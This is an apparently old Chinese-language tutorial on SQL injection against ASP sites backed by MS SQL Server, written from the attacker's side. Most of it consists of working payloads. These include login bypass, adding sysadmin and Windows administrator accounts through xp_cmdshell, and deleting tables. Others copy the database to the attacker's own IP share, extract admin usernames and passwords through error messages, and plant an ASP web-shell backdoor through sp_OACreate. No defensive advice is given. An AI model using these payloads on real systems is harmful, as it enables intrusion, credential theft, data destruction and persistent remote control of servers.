SQL Injection基础与技巧经验

前言：   
这篇文章是我很久以前的作品了，写完后才知道isno也写了一篇。当我看过isno的那篇后发现了我的文章错了好多个地方，后来我对这篇文章做了一些修改，希望对读者能够有所帮助。   
【什么是SQL Injection】   
SQL Injection应该称为SQL指令植入式攻击，主要属于Input Validation的问题，它是描述一个利用写入特殊SQL程序码攻击应用程序的动作。   
【SQL Injection的原理】   
一般输入帐号密码的网站的SQL语法为   
select * from member where UID =’　"& request("ID") &"　’ nAnd Passwd =’ "& request("Pwd") & " ’   
如果正常使用者输入帐号pl，密码1234   
那么程序便会执行select * from member where UID =’pl’　And Passwd=’1234’   
输入的帐号和密码等信息会取代ASP( or PHP、JSP)中的变量，並由两个单引号(’　’)所包住。那么，如果攻击者已知系统中已有一個Admin的管理者帐号，則输入Admin ’-- ，即可不需输入密码而进入资料库，相应的语句为   
select * from member where UID =’ Admin ’-- ’ nAnd Passwd =’ ’   
（注：“ – ”符号后的任何叙述都会被当作注解，也就是说以上例子的And子句将被SQL视为说明用）   
【检测漏洞】   
对大多数SQL服务器来说，我们并不知道对方程序的具体代码，而靠任何扫描器也不可能发现SQL injection的漏洞，这样我们就要靠手工检测了。由于我们执行SQL语句会用到单引号、分号、逗号、冒号和“――”，所以我们可以在URL后面加上以上符合，或者在表单中的文本框中加入。比如：   
http://jsw/new.asp?id=1’   
http://jsw/new.asp?id=1;   
通过页面返回的信息，判断是否存在SQL injection的漏洞，这种方法只是简单的通过字符过滤来判断，根据IIS的配置不同，返回的信息也可能不同。有时显示   
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’   
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’login_id’ to a column of data type int.   
/index.asp, line 5   
也可能是“http 500-内部服务器错误”，或者显示正常信息，判断的根据主要是经验啦，因为现在好多服务器的没有出错回显了的。   

【执行系统命令】   
SQL injection攻击方法最早源于’or’1’=’1的漏洞（我们暂且称其为漏洞），这个漏洞的原理我想大家因该都知道了，那么随之而来的便是;exec sp_addlogin hax（在数据库内添加一个hax用户），但是这个方法的限制很大，首先ASP使用的SQL Server账号是个管理员，其次请求的提交变量在整个SQL语句的最后，因为有一些程序员采用   
SELECT * FROM news WHERE id=... AND topic=... AND .....   
这种方法请求数据库，那么如果还用以上的例子就会   
news.asp?id=2;exec sp_addlogin hax   
变成   
SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=AND   
整个SQL语句在执行sp_addlogin的存储过程后有AND与判断存在，语法错误，你的sp_addlogin自然也不能正常运行了，因此试试看下面这个方法   
news.asp?id=2;exec sp_addlogin hax;--   
后面的--符号把sp_addlogin后的判断语句变成了注释，这样就不会有语法错误了，sp_addlogin正常执行！   
如何判断我们的命令是否成功执行了呢？我们先装一个_blank">防火墙，打开ICMP和139TCP和445TCP的警告提示然后提交   
news.asp?id=2;exec master.dbo.xp_cmdshell ’ping 你的IP’   
如果_blank">防火墙提示有人ping你，那么因该可以肯定对方的ASP用的是SQL的管理员权限，同时也确定了对方的SQL Server的准确位置，因为很多大一点的网站考虑性能，会吧web服务和数据库分开，当对方大上了补丁看不到源代码时，我想只有这个方法能很快的定位对方的SQL Server的位置了   
那么我们连一起来用吧   
news.asp?id=2;exec master.dbo.sp_addlogin hax;--　   
news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--　   
news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--　   
news.asp?id=2;exec master.dbo.xp_cmdshell ’net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes   
/active:yes /add’;--   
news.asp?id=2;exec master.dbo.xp_cmdshell ’net localgroup administrators hax /add’;--   
这样，你在他的数据库和系统内都留下了hax管理员账号了。   
当然大家可以试试看在id=2后面加上一个’符号，主要看对方的ASP怎么写了。   
运用master..Xp_cmdshell,扩展，我们就可以在目标主机上执行任意命令的，类似的还有xp_startmail, xp_sendmail, sp_makewebtask，具体的用法和master..Xp_cmdshell差不多，我在这里就不多说了。需要指明的是这种攻击方法的前提条件是ASP用管理员账号，所以虚拟空间大家就别试了，不会存在这个漏洞的。   
　 以后我们会讨论，如果对方的ASP不是用SQL管理员账号的时候，我们应该如何攻击。   
【对数据库的攻击】   
通常ASP用的SQL账号就算不是管理员也会是某个数据库的owner,至少对于这个库有很高的管理权限。大家可以试试看   
http://jsw/something.asp?newid=117;select 123;--   
呵呵，报语法错误，select 123错误，显而易见，这个ASP在newid变量后面用’号结束   
那么试试看http://jsw/something..asp?newid=117’;delete news;--   
哈哈，我想只要表名猜对了，数据库里面的信息就被删了。   
还有一种的作法，就是提交   
news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk=’你的IP你的共享目录bak.dat’ ,name=’test’;--   
呵呵，你的_blank">防火墙该发出警告了，有人连接你的445或139(win9端口了，这样，对方的SQL的ip一样也可以暴露，其实backuo database到你的硬盘还是有点夸张了，如果对方数据库很庞大，你又是拨号上网，呵呵，劝你别试了，很难成功传输的。   

【从数据库中提取任意信息】   
这是本文要简单的一个重要的部分。一般来说，用于查询数据的SQL语句会用到以下的这种格式：   
someting.asp:   
v_cat = request("category")   
sqlstr="SELECT * FROM product WHERE PCategory=’" & v_cat & "’"   
set rs=conn.execute(sqlstr)   
那么我们向包含以上代码的ASP文件提交   
http://jsw/index.asp?category=food’or 1=1--’   
切换到程序中后变成   
SELECT * FROM product WHERE PCategory=’food’ or 1=1--’   
也就是说我们可以提交一些非法的值给这个ASP脚本，使它执行我们想要的SQL语句。   
下面我用一个攻击过程来说明SQL injection的利用方法。   
在使用SQL injection攻击的时候，我们首先要得到目标数据库的结构，提交   
http://jsw/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--   
INFORMATION_SCHEMA.TABLES包含的是数据库上的所有表名，我们提交的SQL语句为   
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES—   
主要是用来得到数据库上的第一个表名。当MS SQL Server尝试去执行这个语句的时侯将返回以下的信息：   

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’   
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’syssegments’ to a column of data type int.   
/index.asp, line 5   

而这种ODBC的错误信息恰好包含了我们想要的内容。现在我们得到可数据库中的第一个表名：“syssegments”这是建立数据库后系统自动生成的，接下来我们继续提交：   
http://jsw/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’syssegments’)--   
可以得到下一个表名   
当然，我们也可以通过LIKE对数据库进行查询：   

http://jsw/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ’%25login%25’--   

返回：   

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’   
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’admin_login’ to a column of data type int.   
/index.asp, line 5   

在SQL SERVER中，’%25login%25’ 将会被替换为 %login% 。这样我们同样可以得到了数据库中的第一个表名。我们再来提取admin_login表中的数据分类。   
http://jsw/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’--   
返回：   
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’   
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’login_id’ to a column of data type int.   
/index.asp, line 5   

ODBC 信息中的“admin_login”便是第一个分类内容，要得到其他的分类，还可以使用   
http://jsw/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’)--   

返回：   

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’   
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’login_name’ to a column of data type int.   
/index.asp, line 5   

类似的还有：   
http://jsw/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’,’login_name’,’password’,details’)--   
现在我们来开始提取数据库中的帐号和密码，先从admin_login表中得到第一个login_name。   
提交：   
http://jsw/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--   
返回的信息：   
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’   
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’neo’ to a column of data type int.   
/index.asp, line 5   
很显然，数据库中的第一个“login_name”为neo。看看他的密码是什么：   
http://jsw/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’—   
返回：   
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’   
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’pilv’ to a column of data type int.   
/index.asp, line 5   
也就是说用户neo的密码为pilv。   
【象数据库的内容进行添加和需改】   
要向数据库中提交或者修改数据，我们通常会用到INSERT和 UPDATE命令。   
例如，向数据库中添加信息：   
http://jsw/index.asp?id=10; INSERT INTO ’admin_login’ (’login_id’, ’login_name’, ’password’, ’details’) VALUES (666,’neo2’,’newpas5’,’NA’)—   
这样我们便成功的在数据库中增加了一个用户neo2，密码为newpas5。   

向数据库中修改数据用到的是UPDATE命令，例如更换neo的密码：   

http://jsw/index.asp?id=10; UPDATE ’admin_login’ SET ’password’ = ’newpas5’ WHERE login_name=’neo’—-   
这个语句的意思我想大家一定明白了吧。   
【其他】   
与 OLE Automation/COM 物件相关的延伸预存程序：   
SQL Server 提供了一组存取伺服器外部 OLE 物件相关的预存程序。它们分别是：   

sp_OACreate   
sp_OADestroy   
sp_OAMethod   
sp_OAGetProperty   
sp_OASetProperty   
sp_OAGetErrorInfo   
sp_OAStop   

你可以用它们来建立 OLE 物件(一般COM 物件就可以了，但要支援 IDispatch 介面)，执行物件的方法，读取与修改属性，进行错误处理。但它们无法回应一般 OLE 或 COM 物件的事件。有了 COM/OLE 物件的建立与执行，对於控制系统来说可算是如虎添翼，无所不能了。稍举个例子，我们可以利用它来取得有兴趣的网页的原始码：   

’;DECLARE @shell INT EXEC SP_OACREATE ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:\WINNT\system32\cmd.exe /c type c:\inetpub\wwwroot\sqlinject\login.asp > c:\inetpub\wwwroot\sqlinject\test.txt’--   


利用 Scripting.FileSystemObject 来建立一个ASP网页后门：   

’;DECLARE @fs int,@fi int   
EXEC SP_OACREATE ’Scripting.FileSystemObject’,@fs OUTPUT   
EXEC SP_OAMETHOD @fs,’CreateTextFile’,@fs OUTPUT,’C:\InetPub\WWWRoot\SQLInject\Shell.asp’,1   
EXEC SP_OAMETHOD @fs,’WriteLine’,null,’<% Set objShell=Server.CreateObject("WScript.Shell") : objShell.Run Request("cmd") %>’   

建立 ASP 後门网页。从此透过 URL 就可以执行任何执行档，范例如下：sqlinject/shell.asp?cmd=C:\WINNT\system32\cmd.exe">http://localhost/sqlinject/shell.asp?cmd=C:\WINNT\system32\cmd.exe /c type c:\inetpub\wwwroot\sqlinject\login.asp > c:\inetpub\wwwroot\sqlinject\test.txt   


读取服务器的系统信息：   
’union select @@version,1,1--   
’union select @@version,1,1--   

其他相关的延伸预存程序：   
xp_dirtree ：显示某个目录下的子目录与档案架构   
例子：xp_dirtree ’c:\inetpub\wwwroot\’   
xp_ntsec_enumdomains：列出服务器域名名称   
例子：xp_ntsec_enumdomains   
xp_terminate_process：停掉某个执行中的程序，但赋予的参数是 Process ID   
例子：xp_terminate_process 2484